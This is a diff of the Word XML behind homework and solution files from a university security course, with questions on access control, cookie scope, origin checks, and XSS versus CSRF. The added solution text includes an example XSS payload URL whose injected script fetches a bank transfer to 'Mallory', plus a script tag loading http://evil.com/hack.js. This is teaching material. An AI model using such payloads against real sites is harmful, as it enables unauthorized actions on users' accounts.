           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>The cookie for [username</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>].github.io</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> would </w:t>
+        <w:t xml:space="preserve">The cookie for [username].github.io would </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2342,27 +2299,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve"> head would </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>be ”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>evil.com”, and doesn’t match “bank.com”;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
+        <w:t xml:space="preserve"> head would be ”evil.com”, and doesn’t match “bank.com”;  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2391,33 +2328,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve"> head would </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>be ”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">evil.bank.com”, and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>it contains</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “bank.com”;  </w:t>
+        <w:t xml:space="preserve"> head would be ”evil.bank.com”, and it contains “bank.com”;  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2650,29 +2561,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
@@ -2683,23 +2572,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Question </w:t>
       </w:r>
       <w:r>
@@ -2908,7 +2780,6 @@
                               <w:t xml:space="preserve"> </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -2930,19 +2801,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:b/>
-                                <w:bCs/>
-                                <w:color w:val="B7B7B7"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">w </w:t>
+                              <w:t xml:space="preserve">(w </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
                             <w:r>
@@ -3015,7 +2874,6 @@
                               </w:rPr>
                               <w:t xml:space="preserve">     </w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3025,19 +2883,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>name :</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:b/>
-                                <w:bCs/>
-                                <w:color w:val="B7B7B7"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">= </w:t>
+                              <w:t xml:space="preserve">name := </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
                             <w:r>
@@ -3098,7 +2944,6 @@
                               <w:t xml:space="preserve"> </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3111,7 +2956,6 @@
                               <w:t>fmt.Fprintf</w:t>
                             </w:r>
                             <w:proofErr w:type="spellEnd"/>
-                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3573,13 +3417,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>https://vulnerable.com/hello</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>?name=</w:t>
+        <w:t>https://vulnerable.com/hello?name=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3601,7 +3439,6 @@
         <w:t>src</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -3614,7 +3451,6 @@
         </w:rPr>
         <w:t>http://evil.com/hack.js</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -3686,7 +3522,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>evil.com</w:t>
+        <w:t>vulnerable.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3724,9 +3560,42 @@
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Ans: yes. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>HttpOnly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attribute to TRUE </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3738,6 +3607,17 @@
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
@@ -3790,9 +3670,77 @@
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>https://vulnerable.com/hello?name=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>fetch(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>https:// bank.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>transfer?amount</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>=1000&amp;to=Mallory</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3804,88 +3752,6 @@
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Q 4.5: Design a GET request to demonstrate </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t>one</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> difference</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">between </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">XSS </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t>CSR</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t>F</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4036,85 +3902,72 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve">  INT,                         -- member ID </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Username</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">INT,   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">                      -- member ID </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Username</w:t>
+      <w:r>
+        <w:t>VARCHAR(255),</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    -- </w:t>
+      </w:r>
+      <w:r>
+        <w:t>User</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> name</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Password   </w:t>
+      </w:r>
+      <w:r>
+        <w:t>INT</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">             </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">           </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:t>member</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>VARCHAR(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>255),</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">    -- </w:t>
-      </w:r>
-      <w:r>
-        <w:t>User</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> name</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    Password   </w:t>
-      </w:r>
-      <w:r>
-        <w:t>INT</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">             </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">           </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">-- </w:t>
-      </w:r>
-      <w:r>
-        <w:t>member</w:t>
+        <w:t>password</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4154,7 +4007,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -4201,7 +4053,6 @@
                                 <w:color w:val="B7B7B7"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:eastAsia="Courier New"/>
@@ -4218,17 +4069,7 @@
                                 <w:bCs/>
                                 <w:color w:val="B7B7B7"/>
                               </w:rPr>
-                              <w:t xml:space="preserve"> :</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:eastAsia="Courier New"/>
-                                <w:b/>
-                                <w:bCs/>
-                                <w:color w:val="B7B7B7"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">= </w:t>
+                              <w:t xml:space="preserve"> := </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
                             <w:r>
@@ -4491,7 +4332,6 @@
                               <w:t xml:space="preserve">    </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -4515,7 +4355,6 @@
                               <w:t>Exec</w:t>
                             </w:r>
                             <w:proofErr w:type="spellEnd"/>
-                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>

--- a/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
+++ b/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
@@ -198,7 +198,15 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Alice can read and write to the file x, can read the file y, and can execute the file z. Bob can read x, can read and write </w:t>
+        <w:t xml:space="preserve">Alice can read and write to the file x, can read the file y, and can execute the file z. Bob can read x, can </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>read</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and write </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -395,6 +403,7 @@
         <w:t xml:space="preserve">; </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -402,6 +411,7 @@
         <w:t>y:r</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -438,6 +448,7 @@
         <w:t>Bob -&gt; [</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -445,6 +456,7 @@
         <w:t>x:r</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -1218,8 +1230,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>[username].github.io</w:t>
-      </w:r>
+        <w:t>[username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>].github.io</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
@@ -1289,14 +1310,30 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>[username].github</w:t>
-      </w:r>
+        <w:t>[username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>.com?</w:t>
+        <w:t>].github</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.com</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1334,7 +1371,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve">The cookie for [username].github.io would </w:t>
+        <w:t>The cookie for [username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>].github.io</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> would </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1837,11 +1888,19 @@
         </w:rPr>
         <w:t xml:space="preserve"> with a </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="SimSun"/>
         </w:rPr>
-        <w:t xml:space="preserve">cookie-based </w:t>
+        <w:t>cookie-based</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="SimSun"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2299,7 +2358,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve"> head would be ”evil.com”, and doesn’t match “bank.com”;  </w:t>
+        <w:t xml:space="preserve"> head would </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>be ”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">evil.com”, and doesn’t match “bank.com”;  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2328,7 +2401,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve"> head would be ”evil.bank.com”, and it contains “bank.com”;  </w:t>
+        <w:t xml:space="preserve"> head would </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>be ”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">evil.bank.com”, and it contains “bank.com”;  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2547,8 +2634,16 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>their origin evil or evil.bank.com doesn’t exactly match bank.com</w:t>
-      </w:r>
+        <w:t xml:space="preserve">their origin evil or evil.bank.com doesn’t exactly match </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>bank.com</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2780,6 +2875,7 @@
                               <w:t xml:space="preserve"> </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
+                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -2801,7 +2897,19 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">(w </w:t>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:b/>
+                                <w:bCs/>
+                                <w:color w:val="B7B7B7"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">w </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
                             <w:r>
@@ -2874,6 +2982,7 @@
                               </w:rPr>
                               <w:t xml:space="preserve">     </w:t>
                             </w:r>
+                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -2883,7 +2992,19 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">name := </w:t>
+                              <w:t>name :</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:b/>
+                                <w:bCs/>
+                                <w:color w:val="B7B7B7"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">= </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
                             <w:r>
@@ -2944,6 +3065,7 @@
                               <w:t xml:space="preserve"> </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
+                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
